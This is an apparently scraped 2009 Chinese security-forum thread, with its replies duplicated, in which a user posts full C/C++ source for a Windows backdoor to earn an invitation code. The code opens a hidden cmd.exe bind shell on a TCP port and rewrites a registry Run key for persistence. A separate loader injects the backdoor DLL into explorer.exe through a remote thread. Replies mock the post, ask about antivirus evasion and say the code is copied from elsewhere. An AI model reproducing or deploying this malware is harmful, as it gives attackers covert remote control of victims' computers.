[原创]自己写的一个后门程序，懂编程的进，新手跳过`（申请邀请码）-付费问答-看雪-安全社区|安全招聘|kanxue.com

[旧帖] [原创]自己写的一个后门程序，懂编程的进，新手跳过`（申请邀请码） 0.00雪花

发表于: 2009-7-15 18:45 2743

[旧帖] [原创]自己写的一个后门程序，懂编程的进，新手跳过`（申请邀请码） 0.00雪花

fiendson

2009-7-15 18:45

2743

#include "stdafx.h"
#include "winsock2.h"

#pragma comment(lib,"ws2_32")

#define PORT 5010
#define REG_RUN "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"

struct THREADPARAM
{
SOCKET sock;
HANDLE handle;
};

DWORD WINAPI ControlThread(void *no);
DWORD WINAPI BDoor(void *lp);
DWORD WINAPI RecvThread(void *lp);
DWORD WINAPI SendThread(void *lp);
DWORD WINAPI WriteReg(void *no);

BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
::CreateThread(NULL,0,ControlThread,NULL,0,NULL);
break;
}

case DLL_PROCESS_DETACH:
{
break;
}
}
return TRUE;
}

DWORD WINAPI ControlThread(void *no)
{
CreateThread(NULL,0,WriteReg,NULL,0,NULL);

WSADATA wsaData;
SOCKET listenSock;
if(::WSAStartup(MAKEWORD(2,2),&wsaData)!=0)
{
return -1;
}

if((listenSock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
{
return -1;
}

sockaddr_in localAddr,inAddr;
int addrLen=sizeof(inAddr);

localAddr.sin_addr.S_un.S_addr=0;
localAddr.sin_family=AF_INET;
localAddr.sin_port=htons(PORT);
if(bind(listenSock,(sockaddr *)&localAddr,sizeof(localAddr))

==SOCKET_ERROR)
{
closesocket(listenSock);
return -1;
}
listen(listenSock,5);

while(TRUE)
{
SOCKET acceptSock=accept(listenSock,(sockaddr *)&inAddr,&addrLen);
DWORD ID;
CreateThread(NULL,0,BDoor,&acceptSock,0,&ID);
Sleep(100);
}

closesocket(listenSock);
::WSACleanup();
}

DWORD WINAPI WriteReg(void *no)
{
char sysPath[MAX_PATH]={0};
int ret=::GetSystemDirectory(sysPath,MAX_PATH);
if(sysPath[ret-1]!='\\')
strcat(sysPath,"\\");
strcat(sysPath,"DllInjection.exe");
int len=strlen(sysPath);
while(TRUE)
{
HKEY hKey;
if(::RegOpenKey(HKEY_LOCAL_MACHINE,REG_RUN,&hKey)!=ERROR_SUCCESS)
continue;
::RegSetValueEx(hKey,"sysDll",0,REG_SZ,(BYTE *)sysPath,len);

::RegCloseKey(hKey);
Sleep(5000);
}
return 0;
}

DWORD WINAPI BDoor(void *lp)
{
SOCKET sock=*((SOCKET *)lp);
HANDLE hCmdOut,hCmdIn,hRead,hWrite;

SECURITY_ATTRIBUTES sec={0};
sec.nLength=sizeof(sec);
sec.lpSecurityDescriptor=NULL;
sec.bInheritHandle=TRUE;
CreatePipe(&hCmdIn,&hWrite,&sec,0);
CreatePipe(&hRead,&hCmdOut,&sec,0);

char cmdDir[MAX_PATH]={0};
::GetSystemDirectory(cmdDir,MAX_PATH);
if(cmdDir[strlen(cmdDir)-1]!='\\')
strcat(cmdDir,"\\");
strcat(cmdDir,"cmd.exe");

STARTUPINFO startUpInfo={0};
startUpInfo.cb=sizeof(startUpInfo);
startUpInfo.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
startUpInfo.wShowWindow=SW_HIDE;
startUpInfo.hStdError=startUpInfo.hStdOutput=hCmdOut;
startUpInfo.hStdInput=hCmdIn;

PROCESS_INFORMATION processInfo={0};
int ret=CreateProcess

(cmdDir,NULL,NULL,NULL,TRUE,0,NULL,NULL,&startUpInfo,&processInfo);
if(ret==0)
{
return -1;
}
CloseHandle(hCmdIn);
CloseHandle(hCmdOut);

DWORD ID1,ID2;
HANDLE hRecvThread,hSendThread;
THREADPARAM recvParam={0},sendParam={0};

recvParam.sock=sock;
recvParam.handle=hWrite;
hRecvThread=CreateThread(NULL,0,RecvThread,&recvParam,0,&ID1);

sendParam.sock=sock;
sendParam.handle=hRead;
hSendThread=CreateThread(NULL,0,SendThread,&sendParam,0,&ID2);

ULONG code;
::WaitForSingleObject(hRecvThread,INFINITE);
::GetExitCodeThread(hSendThread,&code);
::TerminateThread(hSendThread,code);
::GetExitCodeProcess(processInfo.hProcess,&code);
::TerminateProcess(processInfo.hProcess,code);
closesocket(sock);
CloseHandle(hWrite);
CloseHandle(hRead);
return 0;
}

DWORD WINAPI RecvThread(void *lp)
{
char cmd[256]={0};
THREADPARAM param=*((THREADPARAM *)lp);
while(1)
{
char temp[2]={0};
int ret=recv(param.sock,temp,1,0);
if(ret==0)
{
break;
}
else if(ret==1)
{
send(param.sock,temp,1,0);
strcat(cmd,temp);
if(temp[0]=='\n')
{
if(_stricmp(cmd,"exit\r\n")==0)
{
break;
}
ULONG len;
::WriteFile(param.handle,cmd,strlen(cmd),&len,NULL);
memset(cmd,0,256);
}
}
}
return 0;
}

DWORD WINAPI SendThread(void *lp)
{
THREADPARAM param=*((THREADPARAM *)lp);
char buf[1024]={0};
while(1)
{
ULONG len=0;
::PeekNamedPipe(param.handle,buf,1024,&len,NULL,NULL);
if(len>0)
{
::ReadFile(param.handle,buf,1024,&len,NULL);
send(param.sock,buf,len,0);
memset(buf,0,1024);
}
Sleep(100);
}
return 0;
}

// Dll.cpp

#include "stdafx.h"
#include "windows.h"
#include "stdlib.h"
#include "tlhelp32.h"
#include "io.h"

long GetProcessID(char *processName);

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
Sleep(5000);
long ID=GetProcessID("explorer");
if(ID==-1)
return -1;

HINSTANCE hDll;
HINSTANCE (* pProc)(LPCTSTR);
DWORD (WINAPI * pThreadProc)(void *);
if((hDll=::LoadLibrary("kernel32.dll"))==NULL)
return -1;
if((pProc=(HINSTANCE (*)(LPCTSTR))::GetProcAddress(hDll,"LoadLibraryA"))

==NULL)
return -1;
pThreadProc=(DWORD (WINAPI *)(void *))pProc;

HANDLE hProcess=::OpenProcess(PROCESS_ALL_ACCESS,TRUE,ID);
if(hProcess==NULL)
return -1;

char pDllPath[MAX_PATH]={0};
char *pRemoteAddr=NULL;
int ret=::GetSystemDirectory(pDllPath,MAX_PATH);
if(pDllPath[ret-1]!='\\')
strcat(pDllPath,"\\");
strcat(pDllPath,"BDoor.dll");
if(::_access(pDllPath,0)==-1)
return -1;

pRemoteAddr=(char*)::VirtualAllocEx(hProcess,NULL,strlen(pDllPath)

1,MEM_COMMIT,PAGE_READWRITE);
if(pRemoteAddr==NULL)
return -1;
ret=::WriteProcessMemory(hProcess,pRemoteAddr,pDllPath,strlen

(pDllPath),NULL);
if(ret==0)
return -1;

HANDLE hRemoteThread=::CreateRemoteThread

(hProcess,NULL,0,pThreadProc,pRemoteAddr,0,NULL);

Sleep(100);
::VirtualFreeEx(hProcess,pRemoteAddr,strlen(pDllPath) 1,MEM_DECOMMIT);
::CloseHandle(hProcess);
return 0;
}

long GetProcessID(char *processName)
{
HANDLE hSnapshot;
PROCESSENTRY32 pe32={0};
BOOL fRet;

hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hSnapshot==NULL)
return -1;

pe32.dwSize=sizeof(PROCESSENTRY32);
fRet=Process32First(hSnapshot,&pe32);
if(!fRet)
return -1;

int g=0;
char drive[_MAX_DRIVE]={0};
char dir[_MAX_DIR]={0};
char fname[_MAX_FNAME]={0};
char ext[_MAX_EXT]={0};
do
{
_splitpath(pe32.szExeFile,drive,dir,fname,ext);
if(_stricmp(processName,fname)==0)
{
g=1;
break;
}
}while(Process32Next(hSnapshot,&pe32));
if(g!=1)
return -1;

return pe32.th32ProcessID;
}

[课程]FART 脱壳王！加量不加价！FART作者讲授！

收藏・1

免费・0

支持

最新回复 (39) 1 2 ▶
fiendson 雪币： 21 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 48 粉丝 0 关注私信	fiendson 2 楼 moonife 今天的邀请码什么时候发啊？ 2009-7-15 18:48 0
大孩子雪币： 125 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 91 粉丝 0 关注私信	大孩子 3 楼光贴代码哪有邀请码？ 2009-7-15 19:37 0
zapline 雪币： 2362 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 66 回帖 2376 粉丝 0 关注私信	zapline 4 楼 2009-7-15 19:44 0
ycjmail 雪币： 67 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 19 粉丝 0 关注私信	ycjmail 5 楼没什么用处 2009-7-15 19:50 0
qsyqsy 雪币： 234 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 28 回帖 685 粉丝 0 关注私信	qsyqsy 6 楼连什么语言都不写，更别说注释了，妄想拿邀请码 2009-7-16 10:10 0
唯我天海雪币： 51 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	唯我天海 7 楼这是什么来的呃... 2009-7-16 11:39 0
fiendson 雪币： 21 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 48 粉丝 0 关注私信	fiendson 8 楼注释是写给新手看的，一个优秀的程序员，一拿到代码，就可以完全模拟出另一个程序了。懂程序的人一看就知道是VC写的，还要另外注明吗？ 2009-7-16 11:40 0
leechee 雪币： 108 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 78 粉丝 0 关注私信	leechee 9 楼帮楼主顶一下，学习中。 2009-7-16 12:04 0
glacierTD 雪币： 63 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 41 粉丝 0 关注私信	glacierTD 10 楼少东西吧？通篇都没看到一个connect函数，那还咋连结呢？ 2009-7-16 12:29 0
sessiondiy 雪币： 2067 活跃值： (82) 能力值： ( LV9，RANK：180 ) 在线值：发帖 37 回帖 3244 粉丝 6 关注私信	sessiondiy 4 11 楼少了这行字感觉不是那么的原味 "这是本人考研后的第一个作品（其实是很简陋的一个东西），拿出来共享，算是纪念考研成功吧！开放源代码，让大虾们见笑了。" http://www.wangchao.net.cn/bbsdetail_67038.html 不知版主有没有在记名? 有的话..此ID下次要转正就更难了. 2009-7-16 12:36 0
moonife 雪币： 370 活跃值： (52) 能力值： ( LV13，RANK：350 ) 在线值：发帖 133 回帖 852 粉丝 5 关注私信	moonife 8 12 楼不记名但请各位新人朋友要对自己和论坛认真负责才好谢谢sessiondiy，谢谢各位的支持了 2009-7-16 12:49 0
北极狐狸雪币： 2368 活跃值： (81) 能力值： (RANK：300 ) 在线值：发帖 46 回帖 1342 粉丝 0 关注私信	北极狐狸 7 13 楼或许就是同一人... 2009-7-16 12:59 0
panmaoru 雪币： 78 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 15 粉丝 0 关注私信	panmaoru 14 楼也是为码而来的 2009-7-16 13:11 0
yufengliu 雪币： 54 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 11 粉丝 0 关注私信	yufengliu 15 楼 C 写的都看不出来别混了都！！ 2009-7-16 13:16 0
dasistcool 雪币： 79 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 8 粉丝 0 关注私信	dasistcool 16 楼后门程序放在 SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 里面启动也太明显了。。。。。。 2009-7-16 13:45 0
WinDebug 雪币： 100 活跃值： (10) 能力值： ( LV3，RANK：20 ) 在线值：发帖 5 回帖 44 粉丝 0 关注私信	WinDebug 17 楼能够饶过多少个国内主流的杀毒软件？？？ 2009-7-16 16:42 0
长江小七雪币： 224 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	长江小七 18 楼楼主太强了。。。 2009-7-16 16:56 0
fiendson 雪币： 21 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 48 粉丝 0 关注私信	fiendson 19 楼这是我早期写的代码`翻了翻硬盘才找出来。最近为了看雪里面的一个源码才千方百计的想混进来的` 想尽量早点拿到激活码。 2009-7-16 18:32 0
fiendson 雪币： 21 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 48 粉丝 0 关注私信	fiendson 20 楼如果顶帖可以拿激活码，我还有个刷论坛的源码，可以现场调试一下`````` 2009-7-16 18:33 0
fiendson 雪币： 21 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 48 粉丝 0 关注私信	fiendson 21 楼不拿邀请，誓不罢休``` 2009-7-16 19:01 0
zapline 雪币： 2362 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 66 回帖 2376 粉丝 0 关注私信	zapline 22 楼你的责任非常大谨慎谨慎 2009-7-16 19:42 0
zapline 雪币： 2362 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 66 回帖 2376 粉丝 0 关注私信	zapline 23 楼我分不出是c还是c++ 不混了 2009-7-16 19:45 0
qsyqsy 雪币： 234 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 28 回帖 685 粉丝 0 关注私信	qsyqsy 24 楼 LZ请看看这是哪里，新人交流投稿，先不算蒙不蒙我（我没学过C++），也不能说新手跳过啊。通篇代码。。。。还说懂程序滴，所谓编程，VB，汇编就不是吗？如果你觉得你很优秀，先转正吧，没有转正的人，我还没看到过高手。会VB跟汇编,编译我还是会滴，别蒙人了 2009-7-17 11:41 0
otprince 雪币： 40 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	otprince 25 楼 2009-7-17 17:48 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

fiendson

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (39) 1 2 ▶
fiendson 雪币： 21 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 48 粉丝 0 关注私信	fiendson 2 楼 moonife 今天的邀请码什么时候发啊？ 2009-7-15 18:48 0
大孩子雪币： 125 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 91 粉丝 0 关注私信	大孩子 3 楼光贴代码哪有邀请码？ 2009-7-15 19:37 0
zapline 雪币： 2362 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 66 回帖 2376 粉丝 0 关注私信	zapline 4 楼 2009-7-15 19:44 0
ycjmail 雪币： 67 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 19 粉丝 0 关注私信	ycjmail 5 楼没什么用处 2009-7-15 19:50 0
qsyqsy 雪币： 234 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 28 回帖 685 粉丝 0 关注私信	qsyqsy 6 楼连什么语言都不写，更别说注释了，妄想拿邀请码 2009-7-16 10:10 0
唯我天海雪币： 51 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	唯我天海 7 楼这是什么来的呃... 2009-7-16 11:39 0
fiendson 雪币： 21 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 48 粉丝 0 关注私信	fiendson 8 楼注释是写给新手看的，一个优秀的程序员，一拿到代码，就可以完全模拟出另一个程序了。懂程序的人一看就知道是VC写的，还要另外注明吗？ 2009-7-16 11:40 0
leechee 雪币： 108 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 78 粉丝 0 关注私信	leechee 9 楼帮楼主顶一下，学习中。 2009-7-16 12:04 0
glacierTD 雪币： 63 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 41 粉丝 0 关注私信	glacierTD 10 楼少东西吧？通篇都没看到一个connect函数，那还咋连结呢？ 2009-7-16 12:29 0
sessiondiy 雪币： 2067 活跃值： (82) 能力值： ( LV9，RANK：180 ) 在线值：发帖 37 回帖 3244 粉丝 6 关注私信	sessiondiy 4 11 楼少了这行字感觉不是那么的原味 "这是本人考研后的第一个作品（其实是很简陋的一个东西），拿出来共享，算是纪念考研成功吧！开放源代码，让大虾们见笑了。" http://www.wangchao.net.cn/bbsdetail_67038.html 不知版主有没有在记名? 有的话..此ID下次要转正就更难了. 2009-7-16 12:36 0
moonife 雪币： 370 活跃值： (52) 能力值： ( LV13，RANK：350 ) 在线值：发帖 133 回帖 852 粉丝 5 关注私信	moonife 8 12 楼不记名但请各位新人朋友要对自己和论坛认真负责才好谢谢sessiondiy，谢谢各位的支持了 2009-7-16 12:49 0
北极狐狸雪币： 2368 活跃值： (81) 能力值： (RANK：300 ) 在线值：发帖 46 回帖 1342 粉丝 0 关注私信	北极狐狸 7 13 楼或许就是同一人... 2009-7-16 12:59 0
panmaoru 雪币： 78 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 15 粉丝 0 关注私信	panmaoru 14 楼也是为码而来的 2009-7-16 13:11 0
yufengliu 雪币： 54 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 11 粉丝 0 关注私信	yufengliu 15 楼 C 写的都看不出来别混了都！！ 2009-7-16 13:16 0
dasistcool 雪币： 79 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 8 粉丝 0 关注私信	dasistcool 16 楼后门程序放在 SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 里面启动也太明显了。。。。。。 2009-7-16 13:45 0
WinDebug 雪币： 100 活跃值： (10) 能力值： ( LV3，RANK：20 ) 在线值：发帖 5 回帖 44 粉丝 0 关注私信	WinDebug 17 楼能够饶过多少个国内主流的杀毒软件？？？ 2009-7-16 16:42 0
长江小七雪币： 224 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	长江小七 18 楼楼主太强了。。。 2009-7-16 16:56 0
fiendson 雪币： 21 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 48 粉丝 0 关注私信	fiendson 19 楼这是我早期写的代码`翻了翻硬盘才找出来。最近为了看雪里面的一个源码才千方百计的想混进来的` 想尽量早点拿到激活码。 2009-7-16 18:32 0
fiendson 雪币： 21 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 48 粉丝 0 关注私信	fiendson 20 楼如果顶帖可以拿激活码，我还有个刷论坛的源码，可以现场调试一下`````` 2009-7-16 18:33 0
fiendson 雪币： 21 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 48 粉丝 0 关注私信	fiendson 21 楼不拿邀请，誓不罢休``` 2009-7-16 19:01 0
zapline 雪币： 2362 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 66 回帖 2376 粉丝 0 关注私信	zapline 22 楼你的责任非常大谨慎谨慎 2009-7-16 19:42 0
zapline 雪币： 2362 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 66 回帖 2376 粉丝 0 关注私信	zapline 23 楼我分不出是c还是c++ 不混了 2009-7-16 19:45 0
qsyqsy 雪币： 234 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 28 回帖 685 粉丝 0 关注私信	qsyqsy 24 楼 LZ请看看这是哪里，新人交流投稿，先不算蒙不蒙我（我没学过C++），也不能说新手跳过啊。通篇代码。。。。还说懂程序滴，所谓编程，VB，汇编就不是吗？如果你觉得你很优秀，先转正吧，没有转正的人，我还没看到过高手。会VB跟汇编,编译我还是会滴，别蒙人了 2009-7-17 11:41 0
otprince 雪币： 40 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	otprince 25 楼 2009-7-17 17:48 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复